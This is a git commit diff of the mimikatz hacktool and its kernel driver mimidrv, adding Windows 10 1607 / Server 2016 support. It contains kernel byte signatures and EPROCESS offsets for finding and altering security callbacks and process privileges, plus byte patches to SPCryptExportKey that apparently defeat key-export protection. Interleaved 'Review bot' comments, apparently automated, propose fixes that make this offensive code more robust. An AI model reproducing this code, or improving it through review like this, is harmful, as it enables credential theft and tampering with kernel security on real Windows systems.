[new] mimikatz, mimilib & mimidrv Windows Server 2016 support
[fix] mimidrv kkll_m_process_fullprivileges buffer size check
parent
57f4101567
commit
cdd0722efa
@ -36,8 +36,9 @@ typedef enum _KIWI_OS_INDEX {
|
||||
KiwiOsIndex_BLUE = 6,
|
||||
KiwiOsIndex_10_1507 = 7,
|
||||
KiwiOsIndex_10_1511 = 8,
|
||||
KiwiOsIndex_10_1607 = 9,
|
||||
|
||||
KiwiOsIndex_MAX = 9,
|
||||
KiwiOsIndex_MAX = 10,
|
||||
} KIWI_OS_INDEX, *PKIWI_OS_INDEX;
|
||||
|
||||
#ifdef _M_IX86
|
||||
|
@ -16,8 +16,9 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
|
||||
/* 7 */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* 8 */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* BLUE */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* 10_1507*/ {0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1511*/ {0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1507*/{0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1511*/{0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1607*/{0x004c, 0x000c, 0x0010, 0x0040},
|
||||
#else
|
||||
/* UNK */ {0},
|
||||
/* XP */ {0},
|
||||
@ -28,6 +29,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
|
||||
/* BLUE */ {0x0090, 0x0018, 0x0020, 0x0050},
|
||||
/* 10_1507*/{0x0090, 0x0018, 0x0020, 0x0060},
|
||||
/* 10_1511*/{0x0090, 0x0018, 0x0020, 0x0060},
|
||||
/* 10_1607*/{0x0090, 0x0018, 0x0020, 0x0060},
|
||||
#endif
|
||||
};
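Review bot: The added `/* 10_1607*/` row in the x64 half (and its x86 twin above) is tied to KiwiOsIndex_10_1607 only by its position in the initializer, while the array's first dimension is the fixed `KiwiOsIndex_MAX`, so a row that is forgotten when the next index is added zero-fills silently instead of failing to build; these values are presumably offsets into kernel structures, where a zero is a read or write at the wrong place rather than an error. If the driver's toolchain accepts C99 designated initializers, `[KiwiOsIndex_10_1607] = {0x0090, 0x0018, 0x0020, 0x0060},` binds each row to its enum and makes the `/* … */` labels unnecessary. The same applies to EPROCESS_OffSetTable later in this commit.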
|
||||
|
||||
|
@ -5,7 +5,7 @@
|
||||
*/
|
||||
#include "kkll_m_memory.h"
|
||||
|
||||
NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, PUCHAR *addressePattern, SIZE_T longueur)
|
||||
NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, PUCHAR *addressePattern, SIZE_T longueur)
|
||||
{
|
||||
for(*addressePattern = adresseBase; (adresseMaxMin > adresseBase) ? (*addressePattern <= adresseMaxMin) : (*addressePattern >= adresseMaxMin); *addressePattern += (adresseMaxMin > adresseBase) ? 1 : -1)
|
||||
if(RtlEqualMemory(pattern, *addressePattern, longueur))
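Review bot: The forward loop bound on the `for` line, `*addressePattern <= adresseMaxMin`, lets the RtlEqualMemory call on the next line compare `longueur` bytes starting at adresseMaxMin itself, so the last iterations read up to longueur-1 bytes beyond the window the caller passed; the descending direction has the mirror problem at adresseBase. In a kernel driver an unmapped byte past the window is a bugcheck, not a STATUS_NOT_FOUND. The forward condition should be `(*addressePattern + longueur <= adresseMaxMin)` with the symmetric adjustment for the descending case, and since nothing here probes the range (no MmIsAddressValid), the header comment should say that the whole window must be mapped. The rest of the function body is in the next hunk.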
|
||||
@ -14,7 +14,7 @@ NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxM
|
||||
return STATUS_NOT_FOUND;
|
||||
}
|
||||
|
||||
NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, SIZE_T longueur, LONG offsetTo)
|
||||
NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, SIZE_T longueur, LONG offsetTo)
|
||||
{
|
||||
NTSTATUS status = kkll_m_memory_search(adresseBase, adresseMaxMin, pattern, addressePointeur, longueur);
|
||||
if(NT_SUCCESS(status))
|
||||
|
@ -32,8 +32,8 @@ typedef struct _KKLL_M_MEMORY_GENERIC {
|
||||
KKLL_M_MEMORY_OFFSETS Offsets;
|
||||
} KKLL_M_MEMORY_GENERIC, *PKKLL_M_MEMORY_GENERIC;
|
||||
|
||||
NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, PUCHAR *addressePattern, SIZE_T longueur);
|
||||
NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, SIZE_T longueur, LONG offsetTo);
|
||||
NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, PUCHAR *addressePattern, SIZE_T longueur);
|
||||
NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, SIZE_T longueur, LONG offsetTo);
|
||||
|
||||
PKKLL_M_MEMORY_GENERIC kkll_m_memory_getGenericFromBuild(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics);
|
||||
NTSTATUS kkll_m_memory_vm_read(PVOID Dest, PVOID From, DWORD Size);
|
||||
|
@ -29,6 +29,7 @@ KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"ObCreateObject", L"NtFindAtom", { -5, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Process[] = {0x41, 0xbf, 0x08, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xdf, 0x48, 0x8b, 0xce, 0xe8};
|
||||
UCHAR PTRN_WVI_Process[] = {0x48, 0x89, 0x4c, 0x24, 0x40, 0x41, 0xbe, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0xc1, 0xe8};
|
||||
@ -37,6 +38,7 @@ UCHAR PTRN_WI8_Process[] = {0x8b, 0xc3, 0x48, 0x8d, 0x34, 0xc1, 0x48, 0x8b, 0xce
|
||||
UCHAR PTRN_W81_Process[] = {0x48, 0x8d, 0x04, 0xc1, 0x48, 0x89, 0x45, 0x70, 0x48, 0x8b, 0xc8, 0xe8};
|
||||
UCHAR PTRN_W10_1507_Process[] = {0x8b, 0xc3, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0x49, 0x8d, 0x0c, 0xc7, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Process[] = {0x49, 0x8d, 0x0c, 0xff, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
|
||||
UCHAR PTRN_W10_1607_Process[] = {0x49, 0x8d, 0x0c, 0xfc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"SeCreateAccessStateEx", L"PsReferenceImpersonationToken", { -4, 64}},
|
||||
@ -45,6 +47,7 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"ObCreateObject", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_1607_Process), PTRN_W10_1607_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Image[] = {0x4c, 0x8b, 0xf1, 0x48, 0x89, 0x78, 0x20, 0x4d, 0x8b, 0xe0, 0x4c, 0x8b, 0xea, 0xbd, 0x08, 0x00, 0x00, 0x00};
|
||||
UCHAR PTRN_WVI_Image[] = {0x4c, 0x8b, 0xf2, 0x41, 0x0f, 0xba, 0x6d, 0x00, 0x0a, 0x4c, 0x8b, 0xf9, 0x49, 0xc7, 0x00, 0x38, 0x00, 0x00, 0x00};
|
||||
@ -60,6 +63,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = {
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateThreadNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"SeRegisterLogonSessionTerminatedRoutineEx", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Object[] = {0x40, 0x32, 0xf6, 0x4c, 0x89, 0x7c, 0x24, 0x78, 0x45, 0x33, 0xff, 0x4d, 0x85, 0xe4};
|
||||
UCHAR PTRN_WVI_Object[] = {0x41, 0x8a, 0xdf, 0x4c, 0x89, 0x7c, 0x24, 0x58, 0x4d, 0x3b, 0xe7, 0x88, 0x5c, 0x24, 0x66, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x49, 0x8b, 0xef, 0xc7, 0x44, 0x24, 0x68};
|
||||
@ -75,6 +79,7 @@ KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { 25, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { 25, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 25, 0x010, 0x070, 0x0c8}},
|
||||
};
|
||||
UCHAR PTRN_W23_Reg[] = {0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd7, 0xe8};
|
||||
UCHAR PTRN_WVI_Reg[] = {0x48, 0x8b, 0xf0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84};
|
||||
@ -90,6 +95,7 @@ KKLL_M_MEMORY_GENERIC RegReferences[] = {
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -9, 0x028}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
UCHAR PTRN_WXP_Thread[] = {0xc7, 0x45, 0xa4, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xbc, 0xe8};
|
||||
@ -108,6 +114,7 @@ KKLL_M_MEMORY_GENERIC ThreadReferences[] = { // PspCreateThreadNotifyRoutine
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Thread), PTRN_W81_Thread}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Process[] = {0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xcc, 0xe8};
|
||||
UCHAR PTRN_W23_Process[] = {0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xc8, 0xe8};
|
||||
@ -116,7 +123,7 @@ UCHAR PTRN_WI7_Process[] = {0x83, 0x65, 0x30, 0x00, 0xff, 0x75, 0x20, 0xe8};
|
||||
UCHAR PTRN_WI8_Process[] = {0x83, 0xc0, 0x40, 0x89, 0x85, 0x58, 0xff, 0xff, 0xff, 0x8d, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89, 0x45, 0x9c, 0xbe};
|
||||
UCHAR PTRN_W81_Process[] = {0x89, 0x45, 0x9c, 0x83, 0x65, 0x8c, 0x00, 0x8b, 0xc8, 0xe8};
|
||||
UCHAR PTRN_W10_1507_Process[] = {0x8b, 0xf7, 0x57, 0x8b, 0xd0, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Process[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd0, 0x8b, 0xcf, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Process[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd0, 0x8b, 0xcf, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ProcessReferences[] = { // PspCreateProcessNotifyRoutine
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Process), PTRN_WXP_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
@ -126,6 +133,7 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = { // PspCreateProcessNotifyRoutine
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process}, L"PoRegisterCoalescingCallback", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PoRegisterCoalescingCallback", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PoRegisterCoalescingCallback", L"PoRequestShutdownEvent", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Image[] = {0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
|
||||
UCHAR PTRN_W23_Image[] = {0x53, 0x56, 0x57, 0x6a, 0x08, 0xbf};
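Review bot: The 1607 line of the x86 ProcessReferences table reuses PTRN_W10_1511_Process with only the end anchor changed to PoRequestShutdownEvent, and nothing records whether that byte sequence was actually confirmed on a 14393 kernel or just assumed to still be there. Because kkll_m_memory_search (earlier in this commit) appears to return the first RtlEqualMemory hit, a second occurrence of this short sequence inside the new window would be taken silently. A comment on the entry, adjusted to what was really verified, would make the reuse deliberate, e.g. `// 1607: same sequence as 1511 (checked on 14393); only the end anchor moved`; the ImageReferences table below reuses PTRN_W10_1511_Image the same way.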
|
||||
@ -144,6 +152,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = { // PspLoadImageNotifyRoutine
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Image), PTRN_W10_1507_Image}, L"PsSetLoadImageNotifyRoutine", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image}, L"PsSetLoadImageNotifyRoutine", L"RtlGenerateClass5Guid", { -4, 64}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_1511_Image), PTRN_W10_1511_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Object[] = {0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xe0, 0x89, 0x5d, 0xdc, 0xc7, 0x45, 0xe8};
|
||||
UCHAR PTRN_W23_Object[] = {0x3b, 0xfb, 0xc6, 0x45, 0xe6, 0x00, 0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xd8, 0xc7, 0x45, 0xe8};
|
||||
@ -161,6 +170,7 @@ KKLL_M_MEMORY_GENERIC ObjectReferences[] = { // ObpTypeDirectoryObject
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"KseRegisterShim", { -4, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 23, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 23, 0x008, 0x058, 0x088}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 23, 0x008, 0x058, 0x088}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Reg[] = {0x89, 0x7d, 0x10, 0x57, 0xff, 0x75, 0xfc, 0xff, 0x75, 0x08, 0xe8};
|
||||
UCHAR PTRN_W23_Reg[] = {0x89, 0x5d, 0x08, 0x53, 0xff, 0x75, 0xfc, 0x57, 0xe8};
|
||||
@ -178,6 +188,7 @@ KKLL_M_MEMORY_GENERIC RegReferences[] = { // CallbackListHead
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
{KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmSetCallbackObjectContext", L"CmUnRegisterCallback", { -8, 0x01c}},
|
||||
};
|
||||
#endif
|
||||
|
||||
|
@ -17,6 +17,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
|
||||
/* BLUE */ {0x00b8, 0x00c0, 0x0040, 0x02cc},
|
||||
/* 10_1507*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
|
||||
/* 10_1511*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
|
||||
/* 10_1607*/{0x00b8, 0x00c0, 0x0040, 0x02e4},
|
||||
#else
|
||||
/* UNK */ {0},
|
||||
/* XP */ {0},
|
||||
@ -27,6 +28,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
|
||||
/* BLUE */ {0x02e8, 0x02f8, 0x0040, 0x0678},
|
||||
/* 10_1507*/{0x02f0, 0x0300, 0x0040, 0x06a8},
|
||||
/* 10_1511*/{0x02f0, 0x0300, 0x0040, 0x06b0},
|
||||
/* 10_1607*/{0x02f0, 0x0300, 0x0040, 0x06c0},
|
||||
#endif
|
||||
};
|
||||
|
||||
@ -231,7 +233,7 @@ NTSTATUS kkll_m_process_fullprivileges(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_
|
||||
|
||||
if(KiwiOsIndex >= KiwiOsIndex_VISTA)
|
||||
{
|
||||
if(pPid && (szBufferIn == sizeof(PULONG)))
|
||||
if(pPid && (szBufferIn == sizeof(ULONG)))
|
||||
status = PsLookupProcessByProcessId((HANDLE) *pPid, &pProcess);
|
||||
else
|
||||
pProcess = PsGetCurrentProcess();
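Review bot: The corrected size check on the `if(pPid && ...)` line still falls through to `PsGetCurrentProcess()` when pPid is non-NULL but szBufferIn is not exactly sizeof(ULONG), so a malformed request silently acts on the caller's own process instead of being rejected — which is exactly why the old `sizeof(PULONG)` comparison (8 bytes on x64 against a presumably 4-byte PID) went unnoticed. A wrong-sized input with a buffer present should be an error: `else if(pPid) status = STATUS_INFO_LENGTH_MISMATCH;` ahead of the existing `else`, provided the code after this hunk (not visible here) only proceeds on NT_SUCCESS(status). The enclosing function starts before and ends after this hunk.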
|
||||
|
@ -43,17 +43,17 @@ NTSTATUS kkll_m_ssdt_list(PKIWI_BUFFER outBuffer)
|
||||
}
|
||||
|
||||
#ifdef _M_X64
|
||||
const UCHAR PTRN_WALL_Ke[] = {/*0x00, 0x00, 0x4d, 0x0f, 0x45,*/ 0xd3, 0x42, 0x3b, 0x44, 0x17, 0x10, 0x0f, 0x83};
|
||||
const LONG OFFS_WNO8_Ke = -24;//-19;
|
||||
const LONG OFFS_WIN8_Ke = -21;//-16;
|
||||
const LONG OFFS_WIN10A_Ke = -38;//-16;
|
||||
NTSTATUS kkll_m_ssdt_getKeServiceDescriptorTable()
|
||||
{
|
||||
NTSTATUS status = STATUS_NOT_FOUND;
|
||||
UCHAR PTRN_WALL_Ke[] = {0x00, 0x00, 0x4d, 0x0f, 0x45, 0xd3, 0x42, 0x3b, 0x44, 0x17, 0x10, 0x0f, 0x83};
|
||||
LONG OFFS_WNO8_Ke = -19;
|
||||
LONG OFFS_WIN8_Ke = -16;
|
||||
|
||||
if(KeServiceDescriptorTable)
|
||||
status = STATUS_SUCCESS;
|
||||
else
|
||||
status = kkll_m_memory_genericPointerSearch((PUCHAR *) &KeServiceDescriptorTable, ((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE), ((PUCHAR) ZwUnloadKey) + (16 * PAGE_SIZE), PTRN_WALL_Ke, sizeof(PTRN_WALL_Ke), (KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : OFFS_WIN8_Ke);
|
||||
status = kkll_m_memory_genericPointerSearch((PUCHAR *) &KeServiceDescriptorTable, ((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE), ((PUCHAR) ZwUnloadKey) + (16 * PAGE_SIZE), PTRN_WALL_Ke, sizeof(PTRN_WALL_Ke), (KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : (KiwiOsIndex < KiwiOsIndex_10_1607) ? OFFS_WIN8_Ke : OFFS_WIN10A_Ke);
|
||||
return status;
|
||||
}
|
||||
#endif
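Review bot: The new three-way selector on the kkll_m_memory_genericPointerSearch line also routes KiwiOsIndex_UNK (presumably 0, the value getWindowsIndex returns for an unrecognised build) to OFFS_WNO8_Ke, so unless a caller rejects UNK first, an unsupported kernel still gets a pattern search and a pointer computed with a guessed offset. A guard such as `if(KiwiOsIndex == KiwiOsIndex_UNK) return STATUS_NOT_SUPPORTED;` ahead of the search makes that explicit. The leading bytes left commented out in PTRN_WALL_Ke and the `//-19` / `//-16` remnants should be replaced by one comment saying why the pattern was shortened and that the offsets moved by -5 with it (apparently the dropped bytes differ on 1607).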
|
@ -167,8 +167,8 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
|
||||
|
||||
KIWI_OS_INDEX getWindowsIndex()
|
||||
{
|
||||
if(*NtBuildNumber > 10586) // forever 10 =)
|
||||
return KiwiOsIndex_10_1511;
|
||||
if(*NtBuildNumber > 14393) // forever 10 =)
|
||||
return KiwiOsIndex_10_1607;
|
||||
|
||||
switch(*NtBuildNumber)
|
||||
{
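Review bot: The replaced catch-all `if(*NtBuildNumber > 14393) return KiwiOsIndex_10_1607;` maps every future build to the 1607 index, so all the offset tables extended in this commit will be applied, unverified, to kernels whose layout may have moved — and in this driver a wrong offset is a kernel write, not a failed lookup. If that forward mapping is intended (the `// forever 10 =)` remark suggests so), it deserves a comment stating the assumption, e.g. `// builds newer than 14393 are assumed to keep the 1607 layout; re-check every *_OffSetTable row when a new build appears`; otherwise returning KiwiOsIndex_UNK for unknown builds is the safer default. The switch that follows continues in the next hunk.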
|
||||
@ -201,6 +201,9 @@ KIWI_OS_INDEX getWindowsIndex()
|
||||
case 10586:
|
||||
return KiwiOsIndex_10_1511;
|
||||
break;
|
||||
case 14393:
|
||||
return KiwiOsIndex_10_1607;
|
||||
break;
|
||||
default:
|
||||
return KiwiOsIndex_UNK;
|
||||
}
|
||||
|
@ -1232,27 +1232,32 @@ NTSTATUS kuhl_m_crypto_p_capi(int argc, wchar_t * argv[])
|
||||
}
|
||||
|
||||
BYTE PATC_WALL_SPCryptExportKey_EXPORT[] = {0xeb};
|
||||
BYTE PATC_W10_1607_SPCryptExportKey_EXPORT[]= {0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
|
||||
#ifdef _M_X64
|
||||
BYTE PTRN_WI60_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x0f, 0x85};
|
||||
BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x75};
|
||||
BYTE PTRN_WI80_SPCryptExportKey[] = {0xf6, 0x43, 0x24, 0x02, 0x75};
|
||||
BYTE PTRN_WI81_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x75};
|
||||
BYTE PTRN_W10_1607_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x0f, 0x84};
|
||||
BYTE PATC_WI60_SPCryptExportKey_EXPORT[] = {0x90, 0xe9};
|
||||
KULL_M_PATCH_GENERIC CngReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WI60_SPCryptExportKey), PTRN_WI60_SPCryptExportKey}, {sizeof(PATC_WI60_SPCryptExportKey_EXPORT), PATC_WI60_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WNO8_SPCryptExportKey), PTRN_WNO8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI81_SPCryptExportKey), PTRN_WI81_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
